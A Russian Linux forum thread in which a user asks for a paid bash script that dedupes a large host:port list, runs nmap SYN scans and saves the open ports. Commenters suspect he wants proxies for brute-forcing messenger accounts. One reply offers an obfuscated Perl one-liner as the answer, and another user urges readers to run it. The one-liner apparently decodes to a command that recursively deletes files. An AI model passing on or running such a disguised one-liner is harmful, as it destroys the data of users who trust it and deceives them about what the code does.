LINUX.ORG.RU
ФорумJob

NMAP реализовать функционал


0

0

Господа мастера ,требуется Ваша помощь.Задача такая: имеется файл (прим. svalka.txt) файл содержит строки вида -- хост:порт (прим. 112.121.21.21:2321) Необходимо разработать bash скрипт выполняющий следующее:

svalka.txt >> удаление повторов >> nmap -sS -n -P0 -p[ПОРТ(текущий)] [ХОСТ(текущий)] >>все open складываем в >> good.txt (в виде хост:порт).

Основные моменты: 1)скрипт не должен выходить за лимиты оперативы и проца ,которые отведены. 2)Необходимо учесть,что файл svalka.txt может весить 100mb и выше.

Подробнее обсудить оплату и сроки ,милость прошу в ЛС

Час и сто евро. Вообще сам напиши, полезно. Там сначала man uniq, потом цикл простенький. Или там оперативы 30 метров выделено?

tereshchenko ★★
()
Ответ на: комментарий от tereshchenko

На перле можно не весь файл в оперативу грузить!А так да вы бравильно говорите

pinachet ★★★★★
()
Ответ на: комментарий от tereshchenko

> echo "svalka.txt good.txt " | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Не печатает

power
()
Ответ на: комментарий от pinachet

он работает, какие вопросы? запусти - попробуй. каждый пишет, как ему удобнее

val-amart ★★★★★
()

тот скрипт, что тебе дали на убунтуфоруме - однопоточный, и потому будет работать очень долго, тем дольше, чем больше портов недоступны (думай - дни). у меня есть готовый скрипт для проверки доступности портов на питоне. правда, там nc (netcat), но если это важно, на нмап меняется в одну строчку.
если актуально, пиши на мой мейл, есть у меня в профиле

val-amart ★★★★★
()

прозреваю школьника-кулхацкера Васю, который хочет насобирать себе рабочих проксей для брута асек, имея VDS с 64 метрами оперативы.

opensuse
()

> милость прошу в ЛС
> ЛС


также прозреваю, что пост скопирован с какого-нибудь кулксакепру

opensuse
()
Ответ на: комментарий от opensuse

VDS с 64... даже Васе вряд ли понравится :) "прозреваю" - это конечно хорошо и информативно,но меня интересовали конкретные решения.

zarazakaza
() автор топика
Ответ на: комментарий от val-amart

Спасибо за ответ, через некоторое время,этот же человек подсказал как осуществить многопоточность,но все равно на мой взгляд : nmap в качестве прокси чеккера не очень удобное решение.В поисках наткнулся на yaph, и пока этот вариант меня устроил. Всем спасибо за внимание.

zarazakaza
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.